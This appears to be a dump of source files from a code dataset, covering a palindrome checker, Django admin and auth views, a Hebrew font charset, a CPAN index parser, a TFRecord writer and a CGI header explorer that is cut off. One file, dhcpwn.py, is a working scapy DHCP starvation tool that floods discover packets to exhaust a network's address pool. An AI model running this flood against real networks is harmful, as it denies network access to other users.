| repo_name | path | language | license | size | score | prefix | middle | suffix |
|---|---|---|---|---|---|---|---|---|
ArcherSys/ArcherSys | skulpt/src/lib/markupbase.py | Python | mit | 73 | 0 |
raise NotImplementedError("markupbase is not yet implemented in Skulpt")
|
ysrodrigues/Fund-Prog | AD1-Exerc2.py | Python | gpl-3.0 | 1,948 | 0.019608 |
def verificaPalindrome(frase):
    removeWhiteSpaces = []  ### helper list used to strip the whitespace out of the phrase
    removeHypen = []  ### helper list used to strip the hyphens out of the phrase
    palindromo = str(frase).lower().strip()  ### remove leading/trailing whitespace and lowercase the whole phrase
    if (len(palindromo) <= 1):  ### a phrase of length 0 or 1 is a palindrome (<= also covers the even-length recursion base case)
        return True
    ### BEGIN - remove the whitespace inside the phrase - BEGIN ###
    removeWhiteSpaces = palindromo.split(' ')
    palindromo = str()
    for word in removeWhiteSpaces:
        palindromo = palindromo + word
    ### END - remove the whitespace inside the phrase - END ###
    ### BEGIN - remove the hyphens inside the phrase - BEGIN ###
    removeHypen = palindromo.split('-')
    palindromo = str()
    for word in removeHypen:
        palindromo = palindromo + word
    ### END - remove the hyphens inside the phrase - END ###
    if (palindromo[0] == palindromo[-1]):  ### check whether the first and last letters match
        return verificaPalindrome(palindromo[1:-1])  ### drop the first [1] and last [-1] letters and recurse
    return False
f = open('file.txt', 'r')  ### open the generic input file; replace file.txt with whatever file name you want
for line in f:  ### read the lines of the generic input file
    if (line.strip() == "fim"):  ### stop when the line says "fim"; strip the trailing newline before comparing
        break  ### leave the line-reading loop
    elif (verificaPalindrome(line)):
        print("E palindromo")
    else:
        print("Nao e palindromo")
f.close()  ### close the generic input file
###### Read until the user types "fim" ######
while (True):
    frase = input()  ### read the user's input
    if (frase == "fim"):  ### leave the loop when the user types "fim"
        break
    elif (verificaPalindrome(frase)):
        print("E palindromo")
    else:
        print("Nao e palindromo")
|
wdq007/supreme-garbanzo | fkkenv/fukoku/env/admin.py | Python | gpl-3.0 | 461 | 0.02603 |
from django.contrib import admin
# Register your models here.
from .models import Environment,EnvironmentAdmin,Component,ComponentAdmin,Environment_property,Environment_propertyAdmin,Component_attribute,Component_attributeAdmin
admin.site.register(Environment,EnvironmentAdmin)
admin.site.register(Component,ComponentAdmin)
admin.site.register(Environment_property,Environment_propertyAdmin)
admin.site.register(Component_attribute,Component_attributeAdmin)
|
davelab6/pyfontaine | fontaine/charsets/noto_chars/notosanshebrew_regular.py | Python | gpl-3.0 | 9,355 | 0.015927 |
# -*- coding: utf-8 -*-
class Charset(object):
common_name = 'NotoSansHebrew-Regular'
native_name = ''
def glyphs(self):
chars = []
chars.append(0x0000) #null ????
chars.append(0x200C) #uni200C ZERO WIDTH NON-JOINER
chars.append(0x000D) #nonmarkingreturn ????
chars.append(0x200E) #uni200E LEFT-TO-RIGHT MARK
chars.append(0x200F) #uni200F RIGHT-TO-LEFT MARK
chars.append(0x0020) #space SPACE
chars.append(0x200D) #uni200D ZERO WIDTH JOINER
chars.append(0x00A0) #space NO-BREAK SPACE
chars.append(0x20AA) #sheqel NEW SHEQEL SIGN
chars.append(0xFEFF) #null ZERO WIDTH NO-BREAK SPACE
chars.append(0xFB1D) #uniFB1D HEBREW LETTER YOD WITH HIRIQ
chars.append(0xFB1E) #uniFB1E HEBREW POINT JUDEO-SPANISH VARIKA
chars.append(0xFB1F) #yodyod_patah HEBREW LIGATURE YIDDISH YOD YOD PATAH
chars.append(0xFB20) #alternativeayin HEBREW LETTER ALTERNATIVE AYIN
chars.append(0xFB21) #alefwide HEBREW LETTER WIDE ALEF
chars.append(0xFB22) #daletwide HEBREW LETTER WIDE DALET
chars.append(0xFB23) #hewide HEBREW LETTER WIDE HE
chars.append(0xFB24) #kafwide HEBREW LETTER WIDE KAF
chars.append(0xFB25) #lamedwide HEBREW LETTER WIDE LAMED
chars.append(0xFB26) #finalmemwide HEBREW LETTER WIDE FINAL MEM
chars.append(0xFB27) #reshwide HEBREW LETTER WIDE RESH
chars.append(0xFB28) #tavwide HEBREW LETTER WIDE TAV
chars.append(0xFB29) #alt_plussign HEBREW LETTER ALTERNATIVE PLUS SIGN
chars.append(0xFB2A) #shinshindot HEBREW LETTER SHIN WITH SHIN DOT
chars.append(0xFB2B) #shinsindot HEBREW LETTER SHIN WITH SIN DOT
chars.append(0xFB2C) #shindageshshindot HEBREW LETTER SHIN WITH DAGESH AND SHIN DOT
chars.append(0xFB2D) #shindageshsindot HEBREW LETTER SHIN WITH DAGESH AND SIN DOT
chars.append(0xFB2E) #alefpatah HEBREW LETTER ALEF WITH PATAH
chars.append(0xFB2F) #alefqamats HEBREW LETTER ALEF WITH QAMATS
chars.append(0xFB30) #alefmapiq HEBREW LETTER ALEF WITH MAPIQ
chars.append(0xFB31) #betdagesh HEBREW LETTER BET WITH DAGESH
chars.append(0xFB32) #gimeldagesh HEBREW LETTER GIMEL WITH DAGESH
chars.append(0xFB33) #daletdagesh HEBREW LETTER DALET WITH DAGESH
chars.append(0xFB34) #hedagesh HEBREW LETTER HE WITH MAPIQ
chars.append(0xFB35) #vavdagesh HEBREW LETTER VAV WITH DAGESH
chars.append(0xFB36) #zayindagesh HEBREW LETTER ZAYIN WITH DAGESH
chars.append(0xFB38) #tetdagesh HEBREW LETTER TET WITH DAGESH
chars.append(0xFB39) #yoddagesh HEBREW LETTER YOD WITH DAGESH
chars.append(0xFB3A) #finalkafdagesh HEBREW LETTER FINAL KAF WITH DAGESH
chars.append(0xFB3B) #kafdagesh HEBREW LETTER KAF WITH DAGESH
chars.append(0xFB3C) #lameddagesh HEBREW LETTER LAMED WITH DAGESH
chars.append(0xFB3E) #memdagesh HEBREW LETTER MEM WITH DAGESH
chars.append(0xFB40) #nundagesh HEBREW LETTER NUN WITH DAGESH
chars.append(0xFB41) #samekhdagesh HEBREW LETTER SAMEKH WITH DAGESH
chars.append(0xFB43) #finalpedagesh HEBREW LETTER FINAL PE WITH DAGESH
chars.append(0xFB44) #pedagesh HEBREW LETTER PE WITH DAGESH
chars.append(0xFB46) #tsadidagesh HEBREW LETTER TSADI WITH DAGESH
chars.append(0xFB47) #qofdagesh HEBREW LETTER QOF WITH DAGESH
chars.append(0xFB48) #reshdagesh HEBREW LETTER RESH WITH DAGESH
chars.append(0xFB49) #shindagesh HEBREW LETTER SHIN WITH DAGESH
chars.append(0xFB4A) #tavdagesh HEBREW LETTER TAV WITH DAGESH
chars.append(0xFB4B) #vavholam HEBREW LETTER VAV WITH HOLAM
chars.append(0xFB4C) #betrafe HEBREW LETTER BET WITH RAFE
chars.append(0xFB4D) #kafrafe HEBREW LETTER KAF WITH RAFE
chars.append(0xFB4E) #perafe HEBREW LETTER PE WITH RAFE
chars.append(0xFB4F) #aleflamed HEBREW LIGATURE ALEF LAMED
chars.append(0x0591) #uni0591 HEBREW ACCENT ETNAHTA
chars.append(0x0592) #uni0592 HEBREW ACCENT SEGOL
chars.append(0x0593) #uni0593 HEBREW ACCENT SHALSHELET
chars.append(0x0594) #uni0594 HEBREW ACCENT ZAQEF QATAN
chars.append(0x0595) #uni0595 HEBREW ACCENT ZAQEF GADOL
chars.append(0x0596) #uni0596 HEBREW ACCENT TIPEHA
chars.append(0x0597) #uni0597 HEBREW ACCENT REVIA
chars.append(0x0598) #uni0598 HEBREW ACCENT ZARQA
chars.append(0x0599) #uni0599 HEBREW ACCENT PASHTA
chars.append(0x059A) #uni059A HEBREW ACCENT YETIV
chars.append(0x059B) #uni059B HEBREW ACCENT TEVIR
chars.append(0x059C) #uni059C HEBREW ACCENT GERESH
chars.append(0x059D) #uni059D HEBREW ACCENT GERESH MUQDAM
chars.append(0x059E) #uni059E HEBREW ACCENT GERSHAYIM
chars.append(0x059F) #uni059F HEBREW ACCENT QARNEY PARA
chars.append(0x05A0) #uni05A0 HEBREW ACCENT TELISHA GEDOLA
chars.append(0x05A1) #uni05A1 HEBREW ACCENT PAZER
chars.append(0x05A2) #uni05A2 HEBREW ACCENT ATNAH HAFUKH
chars.append(0x05A3) #uni05A3 HEBREW ACCENT MUNAH
chars.append(0x05A4) #uni05A4 HEBREW ACCENT MAHAPAKH
chars.append(0x05A5) #uni05A5 HEBREW ACCENT MERKHA
chars.append(0x05A6) #uni05A6 HEBREW ACCENT MERKHA KEFULA
chars.append(0x05A7) #uni05A7 HEBREW ACCENT DARGA
chars.append(0x05A8) #uni05A8 HEBREW ACCENT QADMA
chars.append(0x05A9) #uni05A9 HEBREW ACCENT TELISHA QETANA
chars.append(0x05AA) #uni05AA HEBREW ACCENT YERAH BEN YOMO
chars.append(0x05AB) #uni05AB HEBREW ACCENT OLE
chars.append(0x05AC) #uni05AC HEBREW ACCENT ILUY
chars.append(0x05AD) #uni05AD HEBREW ACCENT DEHI
chars.append(0x05AE) #uni05AE HEBREW ACCENT ZINOR
chars.append(0x05AF) #uni05AF HEBREW MARK MASORA CIRCLE
chars.append(0x05B0) #sheva HEBREW POINT SHEVA
chars.append(0x05B1) #hatafsegol HEBREW POINT HATAF SEGOL
chars.append(0x05B2) #hatafpatah HEBREW POINT HATAF PATAH
chars.append(0x05B3) #hatafqamats HEBREW POINT HATAF QAMATS
chars.append(0x05B4) #hiriq HEBREW POINT HIRIQ
chars.append(0x05B5) #tsere HEBREW POINT TSERE
chars.append(0x05B6) #segol HEBREW POINT SEGOL
chars.append(0x05B7) #patah HEBREW POINT PATAH
chars.append(0x05B8) #qamats HEBREW POINT QAMATS
chars.append(0x05B9) #holam HEBREW POINT HOLAM
chars.append(0x05BA) #uni05BA HEBREW POINT HOLAM HASER FOR VAV
chars.append(0x05BB) #qubuts HEBREW POINT QUBUTS
chars.append(0x05BC) #dagesh HEBREW POINT DAGESH OR MAPIQ
chars.append(0x05BD) #meteg HEBREW POINT METEG
chars.append(0x05BE) #maqaf HEBREW PUNCTUATION MAQAF
chars.append(0x05BF) #rafe HEBREW POINT RAFE
chars.append(0x05C0) #paseq HEBREW PUNCTUATION PASEQ
chars.append(0x05C1) #shindot HEBREW POINT SHIN DOT
chars.append(0x05C2) #sindot HEBREW POINT SIN DOT
chars.append(0x05C3) #sofpasuq HEBREW PUNCTUATION SOF PASUQ
chars.append(0x05C4) #upper_dot HEBREW MARK UPPER DOT
chars.append(0x05C5) #lowerdot HEBREW MARK LOWER DOT
chars.append(0x05C6) #uni05C6 HEBREW PUNCTUATION NUN HAFUKHA
chars.append(0x05C7) #qamatsqatan HEBREW POINT QAMATS QATAN
chars.append(0x25CC) #uni25CC DOTTED CIRCLE
chars.append(0x05D0) #alef HEBREW LETTER ALEF
chars.append(0x05D1) #bet HEBREW LETTER BET
chars.append(0x05D2) #gimel HEBREW LETTER GIMEL
chars.append(0x05D3) #dalet HEBREW LETTER DALET
chars.append(0x05D4) #he HEBREW LETTER HE
chars.append(0x05D5) #vav HEBREW LETTER VAV
chars.append(0x05D6) #zayin HEBREW LETTER ZAYIN
chars.append(0x05D7) #het HEBREW LETTER HET
chars.append(0x05D8) #tet HEBREW LETTER TET
chars.append(0x05D9) #yod HEBREW LETTER YOD
chars.append(0x05DA) #finalkaf HEBREW LETTER FINAL KAF
chars.append(0x05DB) #kaf HEBREW LETTER KAF
chars.append(0x05DC) #lamed HEBREW LETTER LAMED
|
mschwager/dhcpwn | dhcpwn.py | Python | gpl-3.0 | 2,829 | 0 |
#!/usr/bin/env python3
import argparse
import logging
import string
# Quiet scapy
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy import volatile # noqa: E402
from scapy import sendrecv # noqa: E402
from scapy import config # noqa: E402
from scapy.layers import l2 # noqa: E402
from scapy.layers import inet # noqa: E402
from scapy.layers import dhcp # noqa: E402
# Configuration requires these imports to properly initialize
from scapy import route # noqa: E402, F401
from scapy import route6 # noqa: E402, F401
def dhcp_flood(**kwargs):
iface = kwargs["interface"]
count = kwargs["count"]
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
packet = (
l2.Ether(dst="ff:ff:ff:ff:ff:ff") /
inet.IP(src="0.0.0.0", dst="255.255.255.255") /
inet.UDP(sport=68, dport=67) /
dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) /
dhcp.DHCP(options=[("message-type", "discover"), "end"])
)
sendrecv.sendp(
packet,
iface=iface,
count=count
)
def print_dhcp_response(response):
print("Source: {}".format(response[l2.Ether].src))
print("Destination: {}".format(response[l2.Ether].dst))
for option in response[dhcp.DHCP].options:
if isinstance(option, tuple):
option, *values = option
else:
# For some reason some options are strings instead of tuples
option, *values = option, None
if option in ["end", "pad"]:
break
output = "Option: {} -> {}".format(option, values)
if option == "message-type" and len(values) == 1:
dhcp_type = dhcp.DHCPTypes.get(values[0], "unknown")
output = "{} ({})".format(output, dhcp_type)
print(output)
def dhcp_sniff(**kwargs):
sendrecv.sniff(filter="udp and (port 67 or 68)", prn=print_dhcp_response)
def parse_args():
p = argparse.ArgumentParser(description='''
All your IPs are belong to us.
''', formatter_class=argparse.RawTextHelpFormatter)
p.add_argument(
'-i',
'--interface',
action='store',
default=config.conf.iface,
help='network interface to use'
)
subparsers = p.add_subparsers(dest='command')
subparsers.required = True
flood = subparsers.add_parser('flood')
flood.add_argument(
'-c',
'--count',
action='store',
default=10,
type=int,
help='number of addresses to consume'
)
subparsers.add_parser('sniff')
args = p.parse_args()
return args
def main():
args = parse_args()
dispatch = {
"flood": dhcp_flood,
"sniff": dhcp_sniff,
}
dispatch[args.command](**vars(args))
if __name__ == "__main__":
main()
|
repology/repology | repology/parsers/parsers/cpan.py | Python | gpl-3.0 | 4,152 | 0.002168 |
# Copyright (C) 2016-2019 Dmitry Marakasov <amdmi3@amdmi3.ru>
#
# This file is part of repology
#
# repology is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# repology is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with repology. If not, see <http://www.gnu.org/licenses/>.
from typing import Iterable
from repology.logger import Logger
from repology.packagemaker import NameType, PackageFactory, PackageMaker
from repology.parsers import Parser
from repology.parsers.maintainers import extract_maintainers
class CPANPackagesParser(Parser):
def iter_parse(self, path: str, factory: PackageFactory) -> Iterable[PackageMaker]:
# Since data we get from CPAN is somewhat lacking, we need
# somewhat complex parsing. Here's the example of what we get
# in 02packages.details.txt package index downloaded from CPAN:
#
# Acme::constant 0.001003 G/GL/GLITCHMR/Acme-constant-0.1.3.tar.gz
# Acme::Constructor::Pythonic 0.002 T/TO/TOBYINK/Acme-Constructor-Pythonic-0.002.tar.gz
# Acme::Continent undef P/PE/PERIGRIN/XML-Toolkit-0.15.tar.gz
#
# 1. Module version (second column) does not always correspond
# to package version (which we need), so we need to parse
# package filename. The version may also be undefined.
# 2. All package modules are listed, and we don't need them
# (which is not the problem as CPAN repo is shadow anyway)
#
# So we do our best to parse the filename into package name and
# actual version, and filter entries where module name is
# equal to package name. Some entries are lost, some entries
# are not even in 02packages.details.txt, some are unparsable
# (no version, or garbage in version) but these are negligible.
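# Illustration (not in the original file): tracing the first example line above
# through the logic below, line.split(None, 2) yields
#   module = 'Acme::constant', version = '0.001003',
#   package = 'G/GL/GLITCHMR/Acme-constant-0.1.3.tar.gz';
# stripping the '.tar.gz' extension and splitting on the last '-' then gives
# package_name = 'Acme-constant' and package_version = '0.1.3', which is the
# version actually recorded (not the module version in the second column).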
with open(path) as packagesfile:
skipping_header = True
for nline, line in enumerate(packagesfile, 1):
line = line.strip()
if skipping_header:
if line == '':
skipping_header = False
continue
pkg = factory.begin('line {}'.format(nline))
module, version, package = line.split(None, 2)
package_path, package_file = package.rsplit('/', 1)
package_name = None
for ext in ['.tar.gz', '.tar.bz2', '.zip', '.tgz']:
if package_file.endswith(ext):
package_name = package_file[0:-len(ext)]
break
if package_name is None or '-' not in package_name:
pkg.log('unable to parse package name', Logger.ERROR)
continue
package_name, package_version = package_name.rsplit('-', 1)
if package_version.startswith('v') or package_version.startswith('V'):
package_version = package_version[1:]
if not package_version[0].isdecimal():
pkg.log('skipping bad version {}'.format(package_version), Logger.ERROR)
continue
if module.replace('::', '-').lower() != package_name.lower():
pkg.log('skipping submodule {}'.format(module), Logger.WARNING)
continue
pkg.add_name(package_name, NameType.CPAN_NAME)
pkg.set_version(package_version)
pkg.add_maintainers(extract_maintainers(package_path.split('/')[2].lower() + '@cpan'))
pkg.add_homepages('http://search.cpan.org/dist/' + package_name + '/')
yield pkg
|
googleinterns/via-content-understanding | VideoClassification/SegmentLevelClassifier/writer.py | Python | apache-2.0 | 13,749 | 0.014183 |
"""Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Writer file used to serialize and save data to TFRecords files.
"""
import numpy as np
import os
import pandas as pd
import tensorflow as tf
def add_candidate_content(context, candidates):
"""Add the tensor for the classes this particular video is a candidate for.
Args:
context: context of the video
candidates: dictionary of candidates. Key is video id and value is list of candidate classes
"""
video_id = tf.convert_to_tensor(context["id"])[0].numpy()
if video_id in candidates.keys():
context["candidate_labels"] = np.array(candidates[video_id])
else:
context["candidate_labels"] = np.array([])
return context
def convert_labels(labels, class_csv="vocabulary.csv"):
"""Convert labels from range [0,3861] to range [0,1000]
Args:
labels: Tensor of labels to be converted
class_csv: csv file containing conversion details
"""
class_dataframe = pd.read_csv(class_csv, index_col=0)
class_indices = class_dataframe.index.tolist()
class_indices = np.array(class_indices)
labels = labels.numpy()
new_labels = []
for label in labels:
check = np.nonzero(class_indices == label)[0]
if len(check) > 0:
new_label = check.tolist()[0]
new_labels.append(new_label)
return tf.convert_to_tensor(new_labels)
def convert_to_feature(item, type):
"""Convert item to FeatureList.
Args:
item: item to be converted
type: string denoting the type of item. Can be "float", "byte", or "int"
"""
if type == "float":
item = tf.train.FloatList(value=item)
item = tf.train.Feature(float_list=item)
elif type == "byte":
item = tf.train.BytesList(value=item)
item = tf.train.Feature(bytes_list=item)
elif type == "int":
item = tf.train.Int64List(value=item)
item = tf.train.Feature(int64_list=item)
else:
print("Invalid type entered for converting feature")
return item
def serialize_features(features):
"""Serialize features.
Args:
features: features of the video
"""
audio = features["audio"][0].numpy().tostring()
rgb = features["rgb"][0].numpy().tostring()
audio = convert_to_feature([audio], "byte")
rgb = convert_to_feature([rgb], "byte")
features = {"audio": tf.train.FeatureList(feature=[audio]), "rgb": tf.train.FeatureList(feature=[rgb])}
features = tf.train.FeatureLists(feature_list=features)
return features
def serialize_class_features(features):
"""Serialize features.
Args:
features: features of the video
"""
audio = features["audio"].tostring()
rgb = features["rgb"].tostring()
class_features = features["class_features"]
audio = convert_to_feature([audio], "byte")
rgb = convert_to_feature([rgb], "byte")
class_features = convert_to_feature(class_features, "float")
features = {"audio": tf.train.FeatureList(feature=[audio]), "rgb": tf.train.FeatureList(feature=[rgb]), "class_features": tf.train.FeatureList(feature=[class_features])}
features = tf.train.FeatureLists(feature_list=features)
return features
def serialize_combined_features(features):
"""Serialize features.
Args:
features: features of the video
"""
audio = features["audio"][0].numpy().tostring()
rgb = features["rgb"][0].numpy().tostring()
audio = convert_to_feature([audio], "byte")
rgb = convert_to_feature([rgb], "byte")
feature_list = []
for class_feature in features["class_features"]:
feature_list.append(convert_to_feature(class_feature, "float"))
class_features = tf.train.FeatureList(feature=feature_list)
features = {"audio": tf.train.FeatureList(feature=[audio]), "rgb": tf.train.FeatureList(feature=[rgb]), "class_features": class_features}
features = tf.train.FeatureLists(feature_list=features)
return features
def serialize_video_context(context):
"""Serialize context for a video.
Args:
context: context of the video
"""
video_id = tf.convert_to_tensor(context["id"])[0]
labels = context["labels"].values
segment_labels = context["segment_labels"].values
segment_start_times = context["segment_start_times"].values
segment_scores = context["segment_scores"].values
candidate_labels = context["candidate_labels"]
labels = convert_labels(labels)
segment_labels = convert_labels(segment_labels)
context["id"] = convert_to_feature([video_id.numpy()], "byte")
context["labels"] = convert_to_feature(labels.numpy(), "int")
context["segment_labels"] = convert_to_feature(segment_labels.numpy(), "int")
context["segment_start_times"] = convert_to_feature(segment_start_times.numpy(), "int")
context["segment_scores"] = convert_to_feature(segment_scores.numpy(), "float")
context["candidate_labels"] = convert_to_feature(candidate_labels, "int")
context = tf.train.Features(feature=context)
return context
def serialize_segment_context(context, pipeline_type):
"""Serialize context for a segment.
Args:
context: context of the video
pipeline_type: type of pipeline. Can be train or test
"""
video_id = tf.convert_to_tensor(context["id"])[0]
segment_label = context["segment_label"]
segment_start_time = context["segment_start_time"]
segment_score = context["segment_score"]
if pipeline_type == "train":
segment_label = convert_labels(segment_label)
context["id"] = convert_to_feature([video_id.numpy()], "byte")
context["segment_label"] = convert_to_feature(segment_label.numpy(), "int")
context["segment_start_time"] = convert_to_feature(segment_start_time.numpy(), "int")
context["segment_score"] = convert_to_feature(segment_score.numpy(), "float")
if pipeline_type == "test":
segment_id = context["segment_id"]
candidate_label = context["candidate_label"]
context["segment_id"] = convert_to_feature([segment_id],"int")
context["candidate_label"] = convert_to_feature([candidate_label], "int")
context = tf.train.Features(feature=context)
return context
def serialize_class_segment_context(context, pipeline_type):
"""Serialize context for a segment from class feature generation.
Args:
context: context of the video
pipeline_type: type of pipeline. Can be train or test
"""
segment_label = context["segment_label"]
segment_start_time = context["segment_start_time"]
context["id"] = convert_to_feature([context["id"]], "byte")
context["segment_label"] = convert_to_feature(segment_label.numpy(), "int")
context["segment_start_time"] = convert_to_feature(segment_start_time.numpy(), "int")
context["segment_score"] = convert_to_feature([context["segment_score"]], "float")
if pipeline_type == "test":
segment_id = context["segment_id"].numpy()
candidate_label = context["candidate_label"].numpy()
context["segment_id"] = convert_to_feature(segment_id,"int")
context["candidate_label"] = convert_to_feature(candidate_label, "int")
context = tf.train.Features(feature=context)
return context
def serialize_combined_context(context):
"""Serialize context for a segment from class feature generation.
Args:
context: context of the video
"""
context["id"] = convert_to_feature([context["id"]], "byte")
context["segment_label"] = convert_to_feature(context["segment_label"].numpy(), "int")
context = tf.train.Features(feature=context)
return context
def serialize_data(context, features, type, pipeline_type="train"):
"""Serialize video or segment from context and features.
Args:
context: context of the video
features: features of the video
type: type of data to store. Can either be video, segment, or csf.
pipeline_type: type of pipeline. Can be train or test
"""
if type == "video":
context = serialize_video_context(co
|
rockychen-dpaw/oim-cms | core/views.py | Python | apache-2.0 | 11,814 | 0.001608 |
from django.http import HttpResponseRedirect, HttpResponse, HttpResponseForbidden
from django.contrib.auth import login, logout
from django.core.cache import cache
from django.shortcuts import render
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from ipware.ip import get_ip
import json
import base64
import hashlib
import adal
from wagtail.wagtailcore.models import PageRevision
from wagtail.wagtailsearch.models import Query
from core.models import Content, UserSession
from oim_cms.api import WhoAmIResource
from django.contrib.auth.models import User
from tracking.models import DepartmentUser
from django.views.decorators.cache import never_cache
def force_email(username):
if username.find("@") == -1:
candidates = User.objects.filter(
username__iexact=username)
if not candidates:
return None
return candidates[0].email
return username
def adal_authenticate(email, password):
try:
context = adal.AuthenticationContext(settings.AZUREAD_AUTHORITY)
token = context.acquire_token_with_username_password(
settings.AZUREAD_RESOURCE, email, password,
settings.SOCIAL_AUTH_AZUREAD_OAUTH2_KEY,
settings.SOCIAL_AUTH_AZUREAD_OAUTH2_SECRET
)
except adal.adal_error.AdalError:
return None
candidates = User.objects.filter(email__iexact=token['userId'])
if candidates.exists():
return candidates[0]
else:
return None
def shared_id_authenticate(email, shared_id):
us = UserSession.objects.filter(user__email__iexact=email).order_by('-session__expire_date')
if (not us.exists()) or (us[0].shared_id != shared_id):
return None
return us[0].user
@csrf_exempt
@never_cache
def auth_get(request):
# If user is using SSO, do a normal auth check.
if request.user.is_authenticated():
return auth(request)
if 'sso_user' in request.GET and 'sso_shared_id' in request.GET:
user = shared_id_authenticate(request.GET.get('sso_user'),
request.GET.get('sso_shared_id'))
if user:
response = HttpResponse(json.dumps(
{'email': user.email, 'shared_id': request.GET.get('sso_shared_id')
}), content_type='application/json')
response["X-email"] = user.email
response["X-shared-id"] = request.GET.get('sso_shared_id')
return response
return HttpResponseForbidden()
@csrf_exempt
@never_cache
def auth_dual(request):
# If user has a SSO cookie, do a normal auth check.
if request.user.is_authenticated():
return auth(request)
# else return an empty response
response = HttpResponse('{}', content_type='application/json')
return response
@csrf_exempt
@never_cache
def auth_ip(request):
# Get the IP of the current user, try and match it up to a session.
current_ip = get_ip(request)
# If there's a basic auth header, perform a check.
basic_auth = request.META.get("HTTP_AUTHORIZATION")
if basic_auth:
# Check basic auth against Azure AD as an alternative to SSO.
username, password = base64.b64decode(
basic_auth.split(" ", 1)[1].strip()).decode('utf-8').split(":", 1)
username = force_email(username)
user = shared_id_authenticate(username, password)
if not user:
user = adal_authenticate(username, password)
if user:
response = HttpResponse(json.dumps(
{'email': user.email, 'client_logon_ip': current_ip}), content_type='application/json')
response["X-email"] = user.email
response["X-client-logon-ip"] = current_ip
return response
# If user has a SSO cookie, do a normal auth check.
if request.user.is_authenticated():
return auth(request)
# We can assume that the Session and UserSession tables only contain
# current sessions.
qs = UserSession.objects.filter(
session__isnull=False,
ip=current_ip).order_by("-session__expire_date")
headers = {'client_logon_ip': current_ip}
if qs.exists():
user = qs[0].user
headers["email"] = user.email
try:
headers["kmi_roles"] = DepartmentUser.objects.get(
email__iexact=user.email).extra_data.get("KMIRoles", '')
except:
headers["kmi_roles"] = ''
response = HttpResponse(json.dumps(headers), content_type='application/json')
for key, val in headers.items():
key = "X-" + key.replace("_", "-")
response[key] = val
return response
@csrf_exempt
@never_cache
def auth(request):
# grab the basic auth data from the request
basic_auth = request.META.get("HTTP_AUTHORIZATION")
basic_hash = hashlib.sha1(basic_auth.encode('utf-8')).hexdigest() if basic_auth else None
# store the access IP in the current user session
if request.user.is_authenticated():
try:
usersession = UserSession.objects.get(
session_id=request.session.session_key)
except UserSession.DoesNotExist:
# If the user does not have a UserSession, log them out and return 401 Unauthorised.
logout(request)
return HttpResponse('Unauthorized', status=401)
current_ip = get_ip(request)
if usersession.ip != current_ip:
usersession.ip = current_ip
usersession.save()
# check the cache for a match for the basic auth hash
if basic_hash:
cachekey = "auth_cache_{}".format(basic_hash)
content = cache.get(cachekey)
if content:
response = HttpResponse(content[0], content_type='application/json')
for key, val in content[1].items():
response[key] = val
response["X-auth-cache-hit"] = "success"
# for a new session using cached basic auth, reauthenticate
if not request.user.is_authenticated():
user = User.objects.get(email__iexact=content[1]['X-email'])
user.backend = "django.contrib.auth.backends.ModelBackend"
login(request, user)
return response
# check the cache for a match for the current session key
cachekey = "auth_cache_{}".format(request.session.session_key)
content = cache.get(cachekey)
# return a cached response ONLY if the current session has an authenticated user
if content and request.user.is_authenticated():
response = HttpResponse(content[0], content_type='application/json')
for key, val in content[1].items():
response[key] = val
response["X-auth-cache-hit"] = "success"
return response
cache_basic = False
if not request.user.is_authenticated():
# Check basic auth against Azure AD as an alternative to SSO.
try:
if basic_auth is None:
raise Exception('Missing credentials')
username, password = base64.b64decode(
basic_auth.split(" ", 1)[1].strip()).decode('utf-8').split(":", 1)
username = force_email(username)
# first check for a shared_id match
# if yes, provide a response, but no session cookie
# (hence it'll only work against certain endpoints)
user = shared_id_authenticate(username, password)
if user:
response = HttpResponse(json.dumps(
{'email': user.email, 'shared_id': password
}), content_type='application/json')
response["X-email"] = user.email
response["X-shared-id"] = password
return response
# after that, check against Azure AD
user = adal_authenticate(username, password)
# basic auth using username/password will generate a session cookie
if user:
user.backend = "django.contrib.auth.backends.ModelBackend"
login(request, user)
cache_basic = True
else:
raise Exception('Authentication faile
|
ActiveState/code | recipes/Python/298336_http__Exploring_Headers_Cookies/recipe-298336.py | Python | mit | 9,871 | 0.005471 |
#!/usr/bin/python -u
# 18-08-04
# v1.1.1
# http.py
# A simple CGI script, to explore http headers, cookies etc.
# Copyright Michael Foord
# Free to use, modify and relicense.
# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!
# E-mail or michael AT foord DOT me DOT uk
# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
"""
This CGI script allows you to specify a URL using an HTML form.
It will fetch the specified URL and print the headers from the server.
It will also handle cookies using ClientCookie - if it's available.
It is based on approx.py the CGI-proxy I'm building.
It includes authentication circuitry and I'm using it to understand http authentication.
This script shows using urllib2 to fetch a URL with a request object including User-Agent header and basic authentication.
It also shows the possible http errors - using a dictionary 'borrowed' from BaseHTTPServer
"""
################################################################
# Imports
try:
import cgitb; cgitb.enable()
except:
pass
import os, sys, cgi, pickle
from time import strftime
import urllib2
sys.stderr = sys.stdout
READSIZE = 4000
COOKIEFILE = 'cookies.lwp'
try:
import ClientCookie
openfun = ClientCookie.urlopen
reqfun = ClientCookie.Request
cj = ClientCookie.LWPCookieJar()
if os.path.isfile(COOKIEFILE):
cj.load(COOKIEFILE)
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
ClientCookie.install_opener(opener)
except:
ClientCookie = None
openfun = urllib2.urlopen
reqfun = urllib2.Request
###############################################################
# Nicked from BaseHTTPServer
# This is the basic table of HTTP errors
errorlist = { 400: ('Bad Request',
'The Server thinks your request was malformed.'),
401: ('Unauthorized',
'No permission -- see authorization schemes'),
402: ('Payment required',
'No payment -- see charging schemes'),
403: ('Forbidden',
'Request forbidden -- authorization will not help'),
404: ('Not Found', 'Nothing matches the given URI'),
405: ('Method Not Allowed',
